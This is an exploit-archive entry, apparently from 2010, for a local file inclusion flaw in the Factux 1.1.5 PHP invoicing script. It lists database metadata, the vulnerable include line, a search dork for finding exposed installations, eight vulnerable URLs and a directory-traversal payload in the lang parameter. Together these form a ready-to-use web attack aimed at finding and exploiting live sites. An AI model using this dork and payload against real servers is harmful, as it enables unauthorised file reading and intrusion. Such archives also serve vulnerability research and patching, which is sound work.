EXPLOITS

Factux - Local File Inclusion

Author: ALTBTA
type: webapps
platform: php
port: 
date_added: 2010-05-05  
date_updated:   
verified: 0  
codes: OSVDB-64382;OSVDB-64381;OSVDB-64380;OSVDB-64379;OSVDB-64378;OSVDB-64377;OSVDB-64376;OSVDB-64375  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 12521.txt  

[~]######################################### InformatioN
#############################################[~]
[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~]######################################### ExploiT
#############################################[~]
[~] dork: "Factux le facturier libre V 1.1.5"

### include_once("include/language/$lang.php");

[~] Vulnerable File :

http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=


[~] Example :

http://[site]/factux/ca_annee.php?lang=../../index


[~]#########################################~~{  altbta
}~~######################################[~]

rxh & sad hacker & ab0-3th4b